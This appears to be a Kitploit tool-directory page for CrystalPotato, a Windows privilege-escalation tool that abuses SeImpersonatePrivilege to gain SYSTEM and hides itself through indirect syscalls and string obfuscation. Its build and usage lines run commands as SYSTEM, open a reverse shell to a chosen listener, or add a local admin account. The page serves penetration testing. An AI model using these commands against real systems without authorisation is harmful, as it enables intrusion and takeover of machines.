Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CrystalPotato — Crystal port of GodPotato to abuse SeImpersonatePrivilege with indirect syscalls, dynamic API resolution and compile-time string obfuscation. Run commands, reverse shells or add users | Kitploit
Tools/GitHubGitHub/ricardojoserf/crystalpotato
Privilege EscalationExploitationPost-ExploitationPenetration TestingRed TeamingAdversarial Attack
GitHubricardojoserf/crystalpotato

CrystalPotato

Crystal port of GodPotato to abuse SeImpersonatePrivilege with indirect syscalls, dynamic API resolution and compile-time string obfuscation. Run commands, reverse shells or add users

View Repository
81 day agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Website

CrystalPotato

Crystal port of GodPotato, a local privilege escalation from accounts with SeImpersonatePrivilege to SYSTEM. It works by abusing the DCOM OXID Resolver and named pipe impersonation.

Windows APIs are resolved dynamically and invoked through indirect syscall stubs, all strings are XOR-obfuscated at compile time and by default only the command output is printed. Tested on Windows 10, 11 and Server 2025.

CrystalPotato

Build

CrystalPotato compiles to a single file with no dependencies using Crystal on Windows:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

Usage

Execute a command, start a reverse shell, or create a local admin.

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

img2

Sources

  • GodPotato - Original C# implementation by BeichenDream.

  • RustPotato - Rust implementation by safedv.

  • SigmaPotato - C# implementation with extra functionalities by tylerdotrar.

Download Tool
FlagDescription
-c CMDCommand to execute as SYSTEM or shell for reverse shell (default: cmd.exe)
-H HOSTReverse shell listener Host
-P PORTReverse shell listener Port
-u USERCreate local admin - Username
-pw PASSCreate local admin - Password
-p NAMECustom pipe name (default: Crystal)
-dDebug output
-ddFull trace
-hShow help